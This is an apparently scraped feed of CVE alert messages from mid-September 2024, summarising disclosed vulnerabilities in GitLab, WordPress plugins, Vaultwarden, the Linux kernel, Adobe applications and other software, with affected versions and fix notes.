🚨 CVE-2024-6389An issue was discovered in GitLab-CE/EE affecting all versions starting with 17.0 before 17.1.7, 17.2 before 17.2.5, and 17.3 before 17.3.2. An attacker as a guest user was able to access commit information via the release Atom endpoint, contrary to permissions.🎖@cveNotify |
|
| 2024-09-14 15:07:25 |
🚨 CVE-2024-4612An issue has been discovered in GitLab EE affecting all versions starting from 12.9 before 17.1.7, 17.2 before 17.2.5, and 17.3 before 17.3.2. Under certain conditions an open redirect vulnerability could allow for an account takeover by breaking the OAuth flow.🎖@cveNotify |
|
| 2024-09-14 15:07:24 |
🚨 CVE-2024-2743An issue was discovered in GitLab-EE starting with version 13.3 before 17.1.7, 17.2 before 17.2.5, and 17.3 before 17.3.2 that would allow an attacker to modify an on-demand DAST scan without permissions and leak variables.🎖@cveNotify |
|
| 2024-09-14 13:37:24 |
🚨 CVE-2024-6482The Login with phone number plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.49. This is due to a lack of validation and missing capability check on user-supplied data in the 'lwp_update_password_action' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to any other role, including Administrator. The vulnerability was partially patched in version 1.7.40. The login with phone number pro plugin was required to exploit the vulnerability in versions 1.7.40 - 1.7.49.🎖@cveNotify |
|
| 2024-09-14 12:07:39 |
🚨 CVE-2024-39925An issue was discovered in Vaultwarden (formerly Bitwarden_RS) 1.30.3. It lacks an offboarding process for members who leave an organization. As a result, the shared organization key is not rotated when a member departs. Consequently, the departing member, whose access should be revoked, retains a copy of the organization key. Additionally, the application fails to adequately protect some encrypted data stored on the server. Consequently, an authenticated user could gain unauthorized access to encrypted data of any organization, even if the user is not a member of the targeted organization. However, the user would need to know the corresponding organizationId. Hence, if a user (whose access to an organization has been revoked) already possesses the organization key, that user could use the key to decrypt the leaked data.🎖@cveNotify |
|
| 2024-09-14 12:07:33 |
🚨 CVE-2024-39924An issue was discovered in Vaultwarden (formerly Bitwarden_RS) 1.30.3. A vulnerability has been identified in the authentication and authorization process of the endpoint responsible for altering the metadata of an emergency access. It permits an attacker with granted emergency access to escalate their privileges by changing the access level and modifying the wait time. Consequently, the attacker can gain full control over the vault (when only intended to have read access) while bypassing the necessary wait period.🎖@cveNotify |
|
| 2024-09-14 12:07:32 |
🚨 CVE-2024-6582A broken access control vulnerability exists in the latest version of lunary-ai/lunary. The `saml.ts` file allows a user from one organization to update the Identity Provider (IDP) settings and view the SSO metadata of another organization. This vulnerability can lead to unauthorized access and potential account takeover if the email of a user in the target organization is known.🎖@cveNotify |
|
| 2024-09-14 12:07:31 |
🚨 CVE-2024-6087An improper access control vulnerability exists in lunary-ai/lunary at the latest commit (a761d83) on the main branch. The vulnerability allows an attacker to use the auth tokens issued by the 'invite user' functionality to obtain valid JWT tokens. These tokens can be used to compromise target users upon registration for their own arbitrary organizations. The attacker can invite a target email, obtain a one-time use token, retract the invite, and later use the token to reset the password of the target user, leading to full account takeover.🎖@cveNotify |
|
| 2024-09-14 12:07:28 |
🚨 CVE-2024-45368The H2-DM1E PLC's authentication protocol appears to utilize either a custom encoding scheme or a challenge-response protocol. However, there's an observed anomaly in the H2-DM1E PLC's protocol execution, namely its acceptance of multiple distinct packets as valid authentication responses. This behavior deviates from standard security practices where a single, specific response or encoding pattern is expected for successful authentication.🎖@cveNotify |
|
| 2024-09-14 12:07:27 |
🚨 CVE-2024-31416The Eaton Foreseer software provides multiple customizable input fields for the users to configure parameters in the tool like alarms, reports, etc. Some of these input fields were not checking the length and bounds of the entered value. The exploit of this security flaw by a bad actor may result in excessive memory consumption or integer overflow.🎖@cveNotify |
|
| 2024-09-14 12:07:26 |
🚨 CVE-2024-31414The Eaton Foreseer software provides users the capability to customize the dashboard in WebView pages. However, the input fields for this feature in the Eaton Foreseer software lacked proper input sanitization on the server-side, which could lead to injection and execution of malicious scripts when abused by bad actors.🎖@cveNotify |
|
| 2024-09-14 09:37:25 |
🚨 CVE-2023-3410The Bricks theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘customTag' attribute in versions up to, and including, 1.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Bricks Builder (admin-only by default), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This becomes more of an issue when Bricks Builder access is granted to lower-privileged users.🎖@cveNotify |
|
| 2024-09-14 06:37:24 |
🚨 CVE-2024-8797The WP Booking System – Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.19.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-14 04:37:32 |
🚨 CVE-2024-8724The Waitlist Woocommerce ( Back in stock notifier ) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-14 04:37:25 |
🚨 CVE-2024-8039Improper permission configurationDomain configuration vulnerability of the mobile application (com.afmobi.boomplayer) can lead to account takeover risks.🎖@cveNotify |
|
| 2024-09-14 04:37:24 |
🚨 CVE-2024-2236A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.🎖@cveNotify |
|
| 2024-09-14 03:37:25 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-09-14 03:37:24 |
🚨 CVE-2023-5156A flaw was found in the GNU C Library. A recent fix for CVE-2023-4806 introduced the potential for a memory leak, which may result in an application crash.🎖@cveNotify |
|
| 2024-09-14 01:07:24 |
🚨 CVE-2024-8190An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.🎖@cveNotify |
|
| 2024-09-14 00:37:52 |
🚨 CVE-2023-5869A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.🎖@cveNotify |
|
| 2024-09-14 00:37:45 |
🚨 CVE-2023-6606An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-09-14 00:37:44 |
🚨 CVE-2023-6121An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data being printed and potentially leaked to the kernel ring buffer (dmesg).🎖@cveNotify |
|
| 2024-09-13 22:37:25 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-09-13 22:37:24 |
🚨 CVE-2024-4418A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being "freed" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.🎖@cveNotify |
|
| 2024-09-13 21:07:32 |
🚨 CVE-2024-27125A cross-site scripting (XSS) vulnerability has been reported to affect Helpdesk. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network.We have already fixed the vulnerability in the following version:Helpdesk 3.3.1 and later🎖@cveNotify |
|
| 2024-09-13 21:07:25 |
🚨 CVE-2024-39638Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roundup WP Registrations for the Events Calendar allows SQL Injection.This issue affects Registrations for the Events Calendar: from n/a through 2.12.2.🎖@cveNotify |
|
| 2024-09-13 21:07:24 |
🚨 CVE-2024-38793Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-09-13 20:37:24 |
🚨 CVE-2024-45059i-Educar is free, fully online school management software that can be used by school secretaries, teachers, coordinators, and area managers. A SQL Injection vulnerability was found prior to the 2.9 branch in the `ieducar/intranet/funcionario_vinculo_det.php` file, which creates the query by concatenating the unsanitized GET parameter `cod_func`, allowing the attacker to obtain sensitive information such as emails and password hashes. Commit 7824b95745fa2da6476b9901041d9c854bf52ffe fixes the issue.🎖@cveNotify |
|
| 2024-09-13 19:37:44 |
🚨 CVE-2023-49428Tenda AX12 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName.🎖@cveNotify |
|
| 2024-09-13 19:37:43 |
🚨 CVE-2023-5088A bug in QEMU could cause a guest I/O operation otherwise addressed to an arbitrary disk offset to be targeted to offset 0 instead (potentially overwriting the VM's boot code). This could be used, for example, by L2 guests with a virtual disk (vdiskL2) stored on a virtual disk of an L1 (vdiskL1) hypervisor to read and/or write data to LBA 0 of vdiskL1, potentially gaining control of L1 at its next reboot.🎖@cveNotify |
|
| 2024-09-13 19:37:42 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.🎖@cveNotify |
|
| 2024-09-13 19:37:39 |
🚨 CVE-2023-39194A flaw was found in the XFRM subsystem in the Linux kernel. The specific flaw exists within the processing of state filters, which can result in a read past the end of an allocated buffer. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, potentially leading to an information disclosure.🎖@cveNotify |
|
| 2024-09-13 19:37:38 |
🚨 CVE-2023-39192A flaw was found in the Netfilter subsystem in the Linux kernel. The xt_u32 module did not validate the fields in the xt_u32 structure. This flaw allows a local privileged attacker to trigger an out-of-bounds read by setting the size fields with a value beyond the array boundaries, leading to a crash or information disclosure.🎖@cveNotify |
|
| 2024-09-13 19:37:37 |
🚨 CVE-2023-42755A flaw was found in the IPv4 Resource Reservation Protocol (RSVP) classifier in the Linux kernel. The xprt pointer may go beyond the linear part of the skb, leading to an out-of-bounds read in the `rsvp_classify` function. This issue may allow a local user to crash the system and cause a denial of service.🎖@cveNotify |
|
| 2024-09-13 19:37:32 |
🚨 CVE-2023-22515Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.🎖@cveNotify |
|
| 2024-09-13 19:37:31 |
🚨 CVE-2023-4132A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2024-09-13 19:37:26 |
🚨 CVE-2023-3772A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.🎖@cveNotify |
|
| 2024-09-13 19:37:25 |
🚨 CVE-2023-3019A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2024-09-13 19:07:25 |
🚨 CVE-2024-37388An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of lxml before v4.9.1 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.🎖@cveNotify |
|
| 2024-09-13 19:07:24 |
🚨 CVE-2024-36827An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.🎖@cveNotify |
|
| 2024-09-13 18:37:35 |
🚨 CVE-2023-45911An issue in WIPOTEC GmbH ComScale v4.3.29.21344 and v4.4.12.723 allows unauthenticated attackers to login as any user without a password.🎖@cveNotify |
|
| 2024-09-13 18:37:32 |
🚨 CVE-2023-45383In the module "SoNice etiquetage" (sonice_etiquetage) up to version 2.5.9 from Common-Services for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack. Due to a lack of permissions control and a lack of control in the path name construction, a guest can perform a path traversal to view all files on the information system.🎖@cveNotify |
|
| 2024-09-13 18:37:31 |
🚨 CVE-2023-41061A validation issue was addressed with improved logic. This issue is fixed in watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1. A maliciously crafted attachment may result in arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-09-13 18:37:30 |
🚨 CVE-2021-42080An attacker is able to launch a Reflected XSS attack using a crafted URL.🎖@cveNotify |
|
| 2024-09-13 18:37:26 |
🚨 CVE-2023-24468Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2🎖@cveNotify |
|
| 2024-09-13 18:37:25 |
🚨 CVE-2022-24386Stored XSS in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.🎖@cveNotify |
|
| 2024-09-13 18:07:31 |
🚨 CVE-2021-22529A vulnerability identified in NetIQ Advance Authentication that leaks sensitive server information. This issue affects NetIQ Advance Authentication version before 6.3.5.1🎖@cveNotify |
|
| 2024-09-13 18:07:30 |
🚨 CVE-2021-22509A vulnerability identified in storing and reusing information in Advance Authentication. This issue can lead to leakage of sensitive data to unauthorized user. The issue affects NetIQ Advance Authentication before 6.3.5.1🎖@cveNotify |
|
| 2024-09-13 17:37:33 |
🚨 CVE-2023-42319Geth (aka go-ethereum) through 1.13.4, when --http --graphql is used, allows remote attackers to cause a denial of service (memory consumption and daemon hang) via a crafted GraphQL query. NOTE: the vendor's position is that the "graphql endpoint [is not] designed to withstand attacks by hostile clients, nor handle huge amounts of clients/traffic.🎖@cveNotify |
|
| 2024-09-13 17:37:26 |
🚨 CVE-2023-22087Vulnerability in the Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Opera). The supported version that is affected is 5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in takeover of Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-09-13 17:37:25 |
🚨 CVE-2023-22047Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-09-13 17:37:24 |
🚨 CVE-2023-22023Vulnerability in the Oracle Solaris product of Oracle Systems (component: Device Driver Interface). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: CVE-2023-22023 is equivalent to CVE-2023-31284. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-09-13 17:07:33 |
🚨 CVE-2024-46691In the Linux kernel, the following vulnerability has been resolved:usb: typec: ucsi: Move unregister out of atomic sectionCommit '9329933699b3 ("soc: qcom: pmic_glink: Make client-locknon-sleeping")' moved the pmic_glink client list under a spinlock, as itis accessed by the rpmsg/glink callback, which in turn is invoked fromIRQ context.This means that ucsi_unregister() is now called from atomic context,which isn't feasible as it's expecting a sleepable context. An effort isunder way to get GLINK to invoke its callbacks in a sleepable context,but until then lets schedule the unregistration.A side effect of this is that ucsi_unregister() can now happenafter the remote processor, and thereby the communication link with it, isgone. pmic_glink_send() is amended with a check to avoid the resulting NULLpointer dereference.This does however result in the user being informed about this error bythe following entry in the kernel log: ucsi_glink.pmic_glink_ucsi pmic_glink.ucsi.0: failed to send UCSI write request: -5🎖@cveNotify |
|
| 2024-09-13 17:07:26 |
🚨 CVE-2024-46682In the Linux kernel, the following vulnerability has been resolved:nfsd: prevent panic for nfsv4.0 closed files in nfs4_show_openPrior to commit 3f29cc82a84c ("nfsd: split sc_status out ofsc_type") states_show() relied on sc_type field to be of validtype before calling into a subfunction to show content of aparticular stateid. From that commit, we split the validity ofthe stateid into sc_status and no longer changed sc_type to 0while unhashing the stateid. This resulted in kernel oopsingfor nfsv4.0 opens that stay around and in nfs4_show_open()would derefence sc_file which was NULL.Instead, for closed open stateids forgo displaying informationthat relies of having a valid sc_file.To reproduce: mount the server with 4.0, read and closea file and then on the server cat /proc/fs/nfsd/clients/2/states[ 513.590804] Call trace:[ 513.590925] _raw_spin_lock+0xcc/0x160[ 513.591119] nfs4_show_open+0x78/0x2c0 [nfsd][ 513.591412] states_show+0x44c/0x488 [nfsd][ 513.591681] seq_read_iter+0x5d8/0x760[ 513.591896] seq_read+0x188/0x208[ 513.592075] vfs_read+0x148/0x470[ 513.592241] ksys_read+0xcc/0x178🎖@cveNotify |
|
| 2024-09-13 17:07:25 |
🚨 CVE-2024-46673In the Linux kernel, the following vulnerability has been resolved:scsi: aacraid: Fix double-free on probe failureaac_probe_one() calls hardware-specific init functions through theaac_driver_ident::init pointer, all of which eventually call down toaac_init_adapter().If aac_init_adapter() fails after allocating memory for aac_dev::queues,it frees the memory but does not clear that member.After the hardware-specific init function returns an error,aac_probe_one() goes down an error path that frees the memory pointed toby aac_dev::queues, resulting.in a double-free.🎖@cveNotify |
|
| 2024-09-13 16:37:32 |
🚨 CVE-2024-45011In the Linux kernel, the following vulnerability has been resolved:char: xillybus: Check USB endpoints when probing deviceEnsure, as the driver probes the device, that all endpoints that thedriver may attempt to access exist and are of the correct type.All XillyUSB devices must have a Bulk IN and Bulk OUT endpoint ataddress 1. This is verified in xillyusb_setup_base_eps().On top of that, a XillyUSB device may have additional Bulk OUTendpoints. The information about these endpoints' addresses is deducedfrom a data structure (the IDT) that the driver fetches from the devicewhile probing it. These endpoints are checked in setup_channels().A XillyUSB device never has more than one IN endpoint, as all datatowards the host is multiplexed in this single Bulk IN endpoint. This iswhy setup_channels() only checks OUT endpoints.🎖@cveNotify |
|
| 2024-09-13 16:37:31 |
🚨 CVE-2024-44851A stored cross-site scripting (XSS) vulnerability in the Discussion section of Perfex CRM v1.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Content parameter.🎖@cveNotify |
|
| 2024-09-13 16:37:30 |
🚨 CVE-2024-44466COMFAST CF-XR11 V2.7.2 has a command injection vulnerability in function sub_424CB4. Attackers can send POST request messages to /usr/bin/webmgnt and inject commands into parameter iface.🎖@cveNotify |
|
| 2024-09-13 16:37:26 |
🚨 CVE-2024-45618A vulnerability was found in pkcs15-init in OpenSC. An attacker could use a crafted USB Device or Smart Card, which would present the system with a specially crafted response to APDUs. Insufficient or missing checking of return values of functions leads to unexpected work with variables that have not been initialized.🎖@cveNotify |
|
| 2024-09-13 16:37:25 |
🚨 CVE-2009-1605Heap-based buffer overflow in the loadexponentialfunc function in mupdf/pdf_function.c in MuPDF in the mupdf-20090223-win32 package, as used in SumatraPDF 0.9.3 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF file. NOTE: some of these details are obtained from third party information.🎖@cveNotify |
|
| 2024-09-13 16:07:36 |
🚨 CVE-2024-25270An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulnerability by manipulating the ID parameter and increment STEP parameter, leading to the exposure of sensitive user data.🎖@cveNotify |
|
| 2024-09-13 16:07:31 |
🚨 CVE-2024-8695A remote code execution (RCE) vulnerability via crafted extension description/changelog could be abused by a malicious extension in Docker Desktop before 4.34.2.🎖@cveNotify |
|
| 2024-09-13 16:07:30 |
🚨 CVE-2024-43966Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stark Digital WP Testimonial Widget.This issue affects WP Testimonial Widget: from n/a through 3.1.🎖@cveNotify |
|
| 2024-09-13 16:07:26 |
🚨 CVE-2024-7738A vulnerability, which was classified as problematic, has been found in yzane vscode-markdown-pdf 1.5.0. Affected by this issue is some unknown functionality of the component Markdown File Handler. The manipulation leads to pathname traversal. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-13 16:07:25 |
🚨 CVE-2024-4499A Cross-Site Request Forgery (CSRF) vulnerability exists in the XTTS server of parisneo/lollms version 9.6 due to a lax CORS policy. The vulnerability allows attackers to perform unauthorized actions by tricking a user into visiting a malicious webpage, which can then trigger arbitrary LoLLMS-XTTS API requests. This issue can lead to the reading and writing of audio files and, when combined with other vulnerabilities, could allow for the reading of arbitrary files on the system and writing files outside the permitted audio file location.🎖@cveNotify |
|
| 2024-09-13 16:07:24 |
🚨 CVE-2024-3121A remote code execution vulnerability exists in the create_conda_env function of the parisneo/lollms repository, version 5.9.0. The vulnerability arises from the use of shell=True in the subprocess.Popen function, which allows an attacker to inject arbitrary commands by manipulating the env_name and python_version parameters. This issue could lead to a serious security breach as demonstrated by the ability to execute the 'whoami' command among potentially other harmful commands.🎖@cveNotify |
|
| 2024-09-13 15:37:30 |
🚨 CVE-2023-41884ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34.🎖@cveNotify |
|
| 2024-09-13 15:37:27 |
🚨 CVE-2023-49224Precor touchscreen console P62, P80, and P82 contains a default SSH public key in the authorized_keys file. A remote attacker could use this key to gain root privileges.🎖@cveNotify |
|
| 2024-09-13 15:37:26 |
🚨 CVE-2023-49223Precor touchscreen console P62, P80, and P82 could allow a remote attacker to obtain sensitive information because the root password is stored in /etc/passwd. An attacker could exploit this to extract files and obtain sensitive information.🎖@cveNotify |
|
| 2024-09-13 15:37:25 |
🚨 CVE-2023-29486An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.🎖@cveNotify |
|
| 2024-09-13 15:37:24 |
🚨 CVE-2023-39731The leakage of the client secret in Kaibutsunosato v13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2024-09-13 15:07:33 |
🚨 CVE-2024-38257Microsoft AllJoyn API Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-09-13 15:07:26 |
🚨 CVE-2024-38256Windows Kernel-Mode Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-09-13 15:07:25 |
🚨 CVE-2024-7420The Insert PHP Code Snippet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation in the /admin/snippets.php file. This makes it possible for unauthenticated attackers to activate/deactivate and delete code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-13 15:07:24 |
🚨 CVE-2024-5670The web services of Softnext's products, Mail SQR Expert and Mail Archiving Expert do not properly validate user input, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the remote server.🎖@cveNotify |
|
| 2024-09-13 14:37:32 |
🚨 CVE-2024-8637Use after free in Media Router in Google Chrome on Android prior to 128.0.6613.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-09-13 14:37:26 |
🚨 CVE-2024-8636Heap buffer overflow in Skia in Google Chrome prior to 128.0.6613.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-09-13 14:37:25 |
🚨 CVE-2023-3409The Bricks theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.1. This is due to missing or incorrect nonce validation on the 'reset_settings' function. This makes it possible for unauthenticated attackers to reset the theme's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-13 14:37:24 |
🚨 CVE-2023-3408The Bricks theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.1. This is due to missing or incorrect nonce validation on the 'save_settings' function. This makes it possible for unauthenticated attackers to modify the theme's settings, including enabling a setting which allows lower-privileged users such as contributors to perform code execution, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-13 14:07:25 |
🚨 CVE-2024-31842An issue was discovered in Italtel Embrace 1.6.4. The web application inserts the access token of an authenticated user inside GET requests. The query string for the URL could be saved in the browser's history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks. Because the access token in sent in GET requests, this vulnerability could lead to complete account takeover.🎖@cveNotify |
|
| 2024-09-13 13:37:31 |
🚨 CVE-2023-52905In the Linux kernel, the following vulnerability has been resolved:octeontx2-pf: Fix resource leakage in VF driver unbindresources allocated like mcam entries to support the Ntuple featureand hash tables for the tc feature are not getting freed in driverunbind. This patch fixes the issue.🎖@cveNotify |
|
| 2024-09-13 13:37:30 |
🚨 CVE-2023-52901In the Linux kernel, the following vulnerability has been resolved:usb: xhci: Check endpoint is valid before dereferencing itWhen the host controller is not responding, all URBs queued to allendpoints need to be killed. This can cause a kernel panic if wedereference an invalid endpoint.Fix this by using xhci_get_virt_ep() helper to find the endpoint andchecking if the endpoint is valid before dereferencing it.[233311.853271] xhci-hcd xhci-hcd.1.auto: xHCI host controller not responding, assume dead[233311.853393] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000e8[233311.853964] pc : xhci_hc_died+0x10c/0x270[233311.853971] lr : xhci_hc_died+0x1ac/0x270[233311.854077] Call trace:[233311.854085] xhci_hc_died+0x10c/0x270[233311.854093] xhci_stop_endpoint_command_watchdog+0x100/0x1a4[233311.854105] call_timer_fn+0x50/0x2d4[233311.854112] expire_timers+0xac/0x2e4[233311.854118] run_timer_softirq+0x300/0xabc[233311.854127] __do_softirq+0x148/0x528[233311.854135] irq_exit+0x194/0x1a8[233311.854143] __handle_domain_irq+0x164/0x1d0[233311.854149] gic_handle_irq.22273+0x10c/0x188[233311.854156] el1_irq+0xfc/0x1a8[233311.854175] lpm_cpuidle_enter+0x25c/0x418 [msm_pm][233311.854185] cpuidle_enter_state+0x1f0/0x764[233311.854194] do_idle+0x594/0x6ac[233311.854201] cpu_startup_entry+0x7c/0x80[233311.854209] secondary_start_kernel+0x170/0x198🎖@cveNotify |
|
| 2024-09-13 10:37:32 |
🚨 CVE-2024-45109Photoshop Desktop versions 24.7.4, 25.11 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 10:37:25 |
🚨 CVE-2024-41874ColdFusion versions 2023.9, 2021.15 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability by providing crafted input to the application, which when deserialized, leads to execution of malicious code. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-09-13 10:37:24 |
🚨 CVE-2024-8584Orca HCM from LEARNING DIGITAL does not properly restrict access to a specific functionality, allowing unauthenticated remote attacker to exploit this functionality to create an account with administrator privilege and subsequently use it to log in. ( The vendor is currently addressing the vulnerability. Once the fix is completed, we will provide information on the affected versions.)🎖@cveNotify |
|
| 2024-09-13 09:37:37 |
🚨 CVE-2024-41867After Effects versions 23.6.6, 24.5 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could lead to arbitrary file system write operations. An attacker could leverage this vulnerability to modify or corrupt files, potentially leading to a compromise of system integrity. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:31 |
🚨 CVE-2024-41859After Effects versions 23.6.6, 24.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:30 |
🚨 CVE-2024-39384Premiere Pro versions 24.5, 23.6.8 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:29 |
